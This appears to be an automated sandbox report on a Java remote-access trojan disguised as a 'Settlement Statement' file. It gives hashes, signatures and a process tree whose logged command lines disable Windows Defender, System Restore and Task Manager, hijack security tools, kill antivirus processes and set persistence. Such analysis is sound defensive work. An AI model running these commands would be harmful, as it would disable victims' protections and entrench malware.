Analysis
max time kernel: 149s
max time network: 156s
platform: windows7_x64
resource: win7
submitted: 19-08-2020 13:40
Static task: static1
Behavioral task: behavioral1
Sample: Settlement Statement.jar
Resource: win7 (windows7_x64)
0 signatures, 0 seconds
Behavioral task: behavioral2
Sample: Settlement Statement.jar
Resource: win10v200722 (windows10_x64)
0 signatures, 0 seconds
General
Target: Settlement Statement.jar
Size: 410KB
MD5: 067b448f548254e2442e5c63e74f8dd9
SHA1: e35fb2ffd0c72c9dacdb74bcbd22762cb110d2a7
SHA256: 4a2540d400c6c1ceb0ea0f56012631c14b5c29c00c7f9149de2d50feaa55c7c8
SHA512: e5928f53a2bfa6d1fdca8baee6887540eb524b2ad2ca0ef58c4bd62144ce06a87a1b9cdcef9a8882109170fa39ed9e5568823d09839daaf71ad5755249faceb0
Score: 10/10
Malware Config
Signatures
Qarallax RAT support DLL 1 IoCs
resource yara_rule
behavioral1/files/0x000300000001353f-7.dat qarallax_dll
Disables Task Manager via registry modification
Disables use of System Restore points 1 TTPs
Sets file execution options in registry 2 TTPs
Loads dropped DLL 1 IoCs
pid Process
1612 java.exe
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process
Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\"" java.exe
Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\"" java.exe
Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe
Drops desktop.ini file(s) 4 IoCs
description ioc Process
File created C:\Users\Admin\hmJMe\Desktop.ini java.exe
File opened for modification C:\Users\Admin\hmJMe\Desktop.ini attrib.exe
File opened for modification C:\Users\Admin\hmJMe\Desktop.ini attrib.exe
File opened for modification C:\Users\Admin\hmJMe\Desktop.ini java.exe
Drops file in System32 directory 2 IoCs
description ioc Process
File created C:\Windows\System32\aurCh java.exe
File opened for modification C:\Windows\System32\aurCh java.exe
Kills process with taskkill 19 IoCs
pid Process
1088 taskkill.exe
1924 taskkill.exe
1280 taskkill.exe
1496 taskkill.exe
1648 taskkill.exe
1564 taskkill.exe
436 taskkill.exe
2892 taskkill.exe
268 taskkill.exe
1796 taskkill.exe
2052 taskkill.exe
2144 taskkill.exe
3008 taskkill.exe
1424 taskkill.exe
1608 taskkill.exe
2244 taskkill.exe
2432 taskkill.exe
2612 taskkill.exe
2752 taskkill.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process
1128 powershell.exe
1128 powershell.exe
Suspicious use of AdjustPrivilegeToken 100 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process
1612 java.exe
Suspicious use of WriteProcessMemory 798 IoCs
PID 2364 wrote to memory of 892 2364 cmd.exe 277 PID 2364 wrote to memory of 892 2364 cmd.exe 277 PID 1612 wrote to memory of 1980 1612 java.exe 278 PID 1612 wrote to memory of 1980 1612 java.exe 278 PID 1612 wrote to memory of 1980 1612 java.exe 278 PID 1980 wrote to memory of 2076 1980 cmd.exe 279 PID 1980 wrote to memory of 2076 1980 cmd.exe 279 PID 1980 wrote to memory of 2076 1980 cmd.exe 279 PID 1980 wrote to memory of 2152 1980 cmd.exe 280 PID 1980 wrote to memory of 2152 1980 cmd.exe 280 PID 1980 wrote to memory of 2152 1980 cmd.exe 280 PID 1612 wrote to memory of 2052 1612 java.exe 281 PID 1612 wrote to memory of 2052 1612 java.exe 281 PID 1612 wrote to memory of 2052 1612 java.exe 281 PID 2052 wrote to memory of 2156 2052 cmd.exe 282 PID 2052 wrote to memory of 2156 2052 cmd.exe 282 PID 2052 wrote to memory of 2156 2052 cmd.exe 282 PID 2052 wrote to memory of 2380 2052 cmd.exe 283 PID 2052 wrote to memory of 2380 2052 cmd.exe 283 PID 2052 wrote to memory of 2380 2052 cmd.exe 283 PID 1612 wrote to memory of 2104 1612 java.exe 284 PID 1612 wrote to memory of 2104 1612 java.exe 284 PID 1612 wrote to memory of 2104 1612 java.exe 284 PID 2104 wrote to memory of 2080 2104 cmd.exe 285 PID 2104 wrote to memory of 2080 2104 cmd.exe 285 PID 2104 wrote to memory of 2080 2104 cmd.exe 285 PID 2104 wrote to memory of 2160 2104 cmd.exe 286 PID 2104 wrote to memory of 2160 2104 cmd.exe 286 PID 2104 wrote to memory of 2160 2104 cmd.exe 286 PID 1612 wrote to memory of 1656 1612 java.exe 287 PID 1612 wrote to memory of 1656 1612 java.exe 287 PID 1612 wrote to memory of 1656 1612 java.exe 287 PID 1656 wrote to memory of 1888 1656 cmd.exe 288 PID 1656 wrote to memory of 1888 1656 cmd.exe 288 PID 1656 wrote to memory of 1888 1656 cmd.exe 288 PID 1656 wrote to memory of 1576 1656 cmd.exe 289 PID 1656 wrote to memory of 1576 1656 cmd.exe 289 PID 1656 wrote to memory of 1576 1656 cmd.exe 289 PID 1612 wrote to memory of 2228 1612 java.exe 290 PID 1612 wrote to memory of 2228 1612 
java.exe 290 PID 1612 wrote to memory of 2228 1612 java.exe 290 PID 2228 wrote to memory of 2300 2228 cmd.exe 291 PID 2228 wrote to memory of 2300 2228 cmd.exe 291 PID 2228 wrote to memory of 2300 2228 cmd.exe 291 PID 2228 wrote to memory of 2236 2228 cmd.exe 292 PID 2228 wrote to memory of 2236 2228 cmd.exe 292 PID 2228 wrote to memory of 2236 2228 cmd.exe 292 PID 1612 wrote to memory of 1832 1612 java.exe 293 PID 1612 wrote to memory of 1832 1612 java.exe 293 PID 1612 wrote to memory of 1832 1612 java.exe 293 PID 1832 wrote to memory of 956 1832 cmd.exe 294 PID 1832 wrote to memory of 956 1832 cmd.exe 294 PID 1832 wrote to memory of 956 1832 cmd.exe 294 PID 1832 wrote to memory of 2548 1832 cmd.exe 295 PID 1832 wrote to memory of 2548 1832 cmd.exe 295 PID 1832 wrote to memory of 2548 1832 cmd.exe 295 PID 1612 wrote to memory of 2368 1612 java.exe 296 PID 1612 wrote to memory of 2368 1612 java.exe 296 PID 1612 wrote to memory of 2368 1612 java.exe 296 PID 2368 wrote to memory of 2248 2368 cmd.exe 297 PID 2368 wrote to memory of 2248 2368 cmd.exe 297 PID 2368 wrote to memory of 2248 2368 cmd.exe 297 PID 2368 wrote to memory of 2320 2368 cmd.exe 298 PID 2368 wrote to memory of 2320 2368 cmd.exe 298 PID 2368 wrote to memory of 2320 2368 cmd.exe 298 PID 1612 wrote to memory of 2244 1612 java.exe 299 PID 1612 wrote to memory of 2244 1612 java.exe 299 PID 1612 wrote to memory of 2244 1612 java.exe 299 PID 2244 wrote to memory of 2264 2244 cmd.exe 300 PID 2244 wrote to memory of 2264 2244 cmd.exe 300 PID 2244 wrote to memory of 2264 2244 cmd.exe 300 PID 2244 wrote to memory of 2688 2244 cmd.exe 301 PID 2244 wrote to memory of 2688 2244 cmd.exe 301 PID 2244 wrote to memory of 2688 2244 cmd.exe 301 PID 1612 wrote to memory of 2504 1612 java.exe 302 PID 1612 wrote to memory of 2504 1612 java.exe 302 PID 1612 wrote to memory of 2504 1612 java.exe 302 PID 2504 wrote to memory of 2520 2504 cmd.exe 303 PID 2504 wrote to memory of 2520 2504 cmd.exe 303 PID 2504 wrote to memory 
of 2520 2504 cmd.exe 303 PID 2504 wrote to memory of 2436 2504 cmd.exe 304 PID 2504 wrote to memory of 2436 2504 cmd.exe 304 PID 2504 wrote to memory of 2436 2504 cmd.exe 304 PID 1612 wrote to memory of 2812 1612 java.exe 305 PID 1612 wrote to memory of 2812 1612 java.exe 305 PID 1612 wrote to memory of 2812 1612 java.exe 305 PID 2812 wrote to memory of 2752 2812 cmd.exe 306 PID 2812 wrote to memory of 2752 2812 cmd.exe 306 PID 2812 wrote to memory of 2752 2812 cmd.exe 306 PID 2812 wrote to memory of 2432 2812 cmd.exe 307 PID 2812 wrote to memory of 2432 2812 cmd.exe 307 PID 2812 wrote to memory of 2432 2812 cmd.exe 307 PID 1612 wrote to memory of 2492 1612 java.exe 308 PID 1612 wrote to memory of 2492 1612 java.exe 308 PID 1612 wrote to memory of 2492 1612 java.exe 308 PID 2492 wrote to memory of 2332 2492 cmd.exe 309 PID 2492 wrote to memory of 2332 2492 cmd.exe 309 PID 2492 wrote to memory of 2332 2492 cmd.exe 309 PID 2492 wrote to memory of 2624 2492 cmd.exe 310 PID 2492 wrote to memory of 2624 2492 cmd.exe 310 PID 2492 wrote to memory of 2624 2492 cmd.exe 310 PID 1612 wrote to memory of 2672 1612 java.exe 311 PID 1612 wrote to memory of 2672 1612 java.exe 311 PID 1612 wrote to memory of 2672 1612 java.exe 311 PID 2672 wrote to memory of 2644 2672 cmd.exe 312 PID 2672 wrote to memory of 2644 2672 cmd.exe 312 PID 2672 wrote to memory of 2644 2672 cmd.exe 312 PID 2672 wrote to memory of 2612 2672 cmd.exe 313 PID 2672 wrote to memory of 2612 2672 cmd.exe 313 PID 2672 wrote to memory of 2612 2672 cmd.exe 313 PID 1612 wrote to memory of 2412 1612 java.exe 314 PID 1612 wrote to memory of 2412 1612 java.exe 314 PID 1612 wrote to memory of 2412 1612 java.exe 314 PID 2412 wrote to memory of 2324 2412 cmd.exe 315 PID 2412 wrote to memory of 2324 2412 cmd.exe 315 PID 2412 wrote to memory of 2324 2412 cmd.exe 315 PID 2412 wrote to memory of 2392 2412 cmd.exe 316 PID 2412 wrote to memory of 2392 2412 cmd.exe 316 PID 2412 wrote to memory of 2392 2412 cmd.exe 316 PID 1612 
wrote to memory of 2252 1612 java.exe 317 PID 1612 wrote to memory of 2252 1612 java.exe 317 PID 1612 wrote to memory of 2252 1612 java.exe 317 PID 2252 wrote to memory of 2296 2252 cmd.exe 318 PID 2252 wrote to memory of 2296 2252 cmd.exe 318 PID 2252 wrote to memory of 2296 2252 cmd.exe 318 PID 2252 wrote to memory of 2312 2252 cmd.exe 319 PID 2252 wrote to memory of 2312 2252 cmd.exe 319 PID 2252 wrote to memory of 2312 2252 cmd.exe 319 PID 1612 wrote to memory of 2440 1612 java.exe 320 PID 1612 wrote to memory of 2440 1612 java.exe 320 PID 1612 wrote to memory of 2440 1612 java.exe 320 PID 2440 wrote to memory of 2284 2440 cmd.exe 321 PID 2440 wrote to memory of 2284 2440 cmd.exe 321 PID 2440 wrote to memory of 2284 2440 cmd.exe 321 PID 2440 wrote to memory of 2724 2440 cmd.exe 322 PID 2440 wrote to memory of 2724 2440 cmd.exe 322 PID 2440 wrote to memory of 2724 2440 cmd.exe 322 PID 1612 wrote to memory of 2632 1612 java.exe 323 PID 1612 wrote to memory of 2632 1612 java.exe 323 PID 1612 wrote to memory of 2632 1612 java.exe 323 PID 2632 wrote to memory of 1528 2632 cmd.exe 324 PID 2632 wrote to memory of 1528 2632 cmd.exe 324 PID 2632 wrote to memory of 1528 2632 cmd.exe 324 PID 2632 wrote to memory of 2536 2632 cmd.exe 325 PID 2632 wrote to memory of 2536 2632 cmd.exe 325 PID 2632 wrote to memory of 2536 2632 cmd.exe 325 PID 1612 wrote to memory of 2628 1612 java.exe 326 PID 1612 wrote to memory of 2628 1612 java.exe 326 PID 1612 wrote to memory of 2628 1612 java.exe 326 PID 2628 wrote to memory of 2212 2628 cmd.exe 327 PID 2628 wrote to memory of 2212 2628 cmd.exe 327 PID 2628 wrote to memory of 2212 2628 cmd.exe 327 PID 2628 wrote to memory of 1440 2628 cmd.exe 328 PID 2628 wrote to memory of 1440 2628 cmd.exe 328 PID 2628 wrote to memory of 1440 2628 cmd.exe 328 PID 1612 wrote to memory of 1384 1612 java.exe 329 PID 1612 wrote to memory of 1384 1612 java.exe 329 PID 1612 wrote to memory of 1384 1612 java.exe 329 PID 1384 wrote to memory of 3060 1384 
cmd.exe 330 PID 1384 wrote to memory of 3060 1384 cmd.exe 330 PID 1384 wrote to memory of 3060 1384 cmd.exe 330 PID 1384 wrote to memory of 2668 1384 cmd.exe 331 PID 1384 wrote to memory of 2668 1384 cmd.exe 331 PID 1384 wrote to memory of 2668 1384 cmd.exe 331 PID 1612 wrote to memory of 1128 1612 java.exe 332 PID 1612 wrote to memory of 1128 1612 java.exe 332 PID 1612 wrote to memory of 1128 1612 java.exe 332 PID 1128 wrote to memory of 2768 1128 cmd.exe 333 PID 1128 wrote to memory of 2768 1128 cmd.exe 333 PID 1128 wrote to memory of 2768 1128 cmd.exe 333 PID 1128 wrote to memory of 2568 1128 cmd.exe 334 PID 1128 wrote to memory of 2568 1128 cmd.exe 334 PID 1128 wrote to memory of 2568 1128 cmd.exe 334 PID 1612 wrote to memory of 2872 1612 java.exe 335 PID 1612 wrote to memory of 2872 1612 java.exe 335 PID 1612 wrote to memory of 2872 1612 java.exe 335 PID 2872 wrote to memory of 1332 2872 cmd.exe 336 PID 2872 wrote to memory of 1332 2872 cmd.exe 336 PID 2872 wrote to memory of 1332 2872 cmd.exe 336 PID 2872 wrote to memory of 2576 2872 cmd.exe 337 PID 2872 wrote to memory of 2576 2872 cmd.exe 337 PID 2872 wrote to memory of 2576 2872 cmd.exe 337 PID 1612 wrote to memory of 2896 1612 java.exe 338 PID 1612 wrote to memory of 2896 1612 java.exe 338 PID 1612 wrote to memory of 2896 1612 java.exe 338 PID 2896 wrote to memory of 2952 2896 cmd.exe 339 PID 2896 wrote to memory of 2952 2896 cmd.exe 339 PID 2896 wrote to memory of 2952 2896 cmd.exe 339 PID 2896 wrote to memory of 2928 2896 cmd.exe 340 PID 2896 wrote to memory of 2928 2896 cmd.exe 340 PID 2896 wrote to memory of 2928 2896 cmd.exe 340 PID 1612 wrote to memory of 2836 1612 java.exe 341 PID 1612 wrote to memory of 2836 1612 java.exe 341 PID 1612 wrote to memory of 2836 1612 java.exe 341 PID 2836 wrote to memory of 2968 2836 cmd.exe 342 PID 2836 wrote to memory of 2968 2836 cmd.exe 342 PID 2836 wrote to memory of 2968 2836 cmd.exe 342 PID 2836 wrote to memory of 2868 2836 cmd.exe 343 PID 2836 wrote to memory 
of 2868 2836 cmd.exe 343 PID 2836 wrote to memory of 2868 2836 cmd.exe 343 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 1984 attrib.exe 1836 attrib.exe 1828 attrib.exe 1760 attrib.exe 1660 attrib.exe 1960 attrib.exe 1976 attrib.exe 1152 attrib.exe
Processes
-
Format: [depth] PID:n  image path  |  command line; signature hits are listed beneath each process.

[1] PID:1612  C:\Windows\system32\java.exe  |  java -jar "C:\Users\Admin\AppData\Local\Temp\Settlement Statement.jar"
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] PID:1824  C:\Windows\system32\cmd.exe  |  cmd.exe
  [2] PID:1788  C:\Windows\system32\cmd.exe  |  cmd.exe
      - Suspicious use of WriteProcessMemory
    [3] PID:1772  C:\Windows\System32\Wbem\WMIC.exe  |  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
        - Suspicious use of AdjustPrivilegeToken
  [2] PID:1888  C:\Windows\system32\cmd.exe  |  cmd.exe
      - Suspicious use of WriteProcessMemory
    [3] PID:1912  C:\Windows\System32\Wbem\WMIC.exe  |  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
        - Suspicious use of AdjustPrivilegeToken
  [2] PID:1960  C:\Windows\system32\attrib.exe  |  attrib +h C:\Users\Admin\Oracle
      - Views/modifies file attributes
  [2] PID:1976  C:\Windows\system32\attrib.exe  |  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
      - Views/modifies file attributes
  [2] PID:1152  C:\Windows\system32\attrib.exe  |  attrib -s -r C:\Users\Admin\hmJMe\Desktop.ini
      - Drops desktop.ini file(s)
      - Views/modifies file attributes
  [2] PID:1984  C:\Windows\system32\attrib.exe  |  attrib +s +r C:\Users\Admin\hmJMe\Desktop.ini
      - Drops desktop.ini file(s)
      - Views/modifies file attributes
  [2] PID:1836  C:\Windows\system32\attrib.exe  |  attrib -s -r C:\Users\Admin\hmJMe
      - Views/modifies file attributes
  [2] PID:1828  C:\Windows\system32\attrib.exe  |  attrib +s +r C:\Users\Admin\hmJMe
      - Views/modifies file attributes
  [2] PID:1760  C:\Windows\system32\attrib.exe  |  attrib +h C:\Users\Admin\hmJMe
      - Views/modifies file attributes
  [2] PID:1660  C:\Windows\system32\attrib.exe  |  attrib +h +s +r C:\Users\Admin\hmJMe\Lwqbj.class
      - Views/modifies file attributes
  [2] PID:1588  C:\Windows\system32\cmd.exe  |  cmd.exe
      - Suspicious use of WriteProcessMemory
    [3] PID:1632  C:\Windows\system32\reg.exe  |  reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    [3] PID:1116  C:\Windows\system32\reg.exe  |  reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
  [2] PID:1128  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  |  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hmJMe','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hmJMe\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
      - Suspicious behavior: EnumeratesProcesses
  [2] PID:1032  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  [2] PID:1280  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  [2] PID:1424  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
      - Kills process with taskkill
  [2] PID:876  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  [2] PID:1272  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  [2] PID:1572  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  [2] PID:1500  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  [2] PID:332  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  [2] PID:1176  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:1672  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    [3] PID:2020  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
  [2] PID:1044  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  [2] PID:588  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  [2] PID:1916  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  [2] PID:1416  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  [2] PID:1944  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  [2] PID:1832  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  [2] PID:2004  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  [2] PID:1604  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:1896  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    [3] PID:1300  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
  [2] PID:1496  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
      - Kills process with taskkill
  [2] PID:580  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  [2] PID:1856  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  [2] PID:1572  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] PID:1900  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] PID:1648  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
      - Kills process with taskkill
  [2] PID:1504  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] PID:836  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:620  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    [3] PID:1864  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
  [2] PID:1796  C:\Windows\System32\reg.exe  |  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] PID:1088  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
      - Kills process with taskkill
  [2] PID:1984  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:1660  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    [3] PID:1824  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
  [2] PID:1564  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
      - Kills process with taskkill
  [2] PID:2032  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:2000  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    [3] PID:792  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
  [2] PID:1848  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:892  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    [3] PID:1300  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
  [2] PID:268  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
      - Kills process with taskkill
  [2] PID:1840  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:1640  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    [3] PID:2028  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
  [2] PID:860  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:1032  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    [3] PID:528  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
  [2] PID:1608  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
      - Kills process with taskkill
  [2] PID:1940  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:620  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    [3] PID:1368  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
  [2] PID:1796  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
      - Kills process with taskkill
  [2] PID:1584  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:1792  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    [3] PID:792  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
  [2] PID:892  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:832  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    [3] PID:2032  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
  [2] PID:1924  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F
      - Kills process with taskkill
  [2] PID:436  C:\Windows\system32\cmd.exe  |  cmd.exe
    [3] PID:1032  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    [3] PID:1140  C:\Windows\system32\reg.exe  |  reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
  [2] PID:1280  C:\Windows\System32\taskkill.exe  |  "C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F
      - Kills process with taskkill
  [2] PID:1640  C:\Windows\system32\cmd.exe  |  cmd.exe
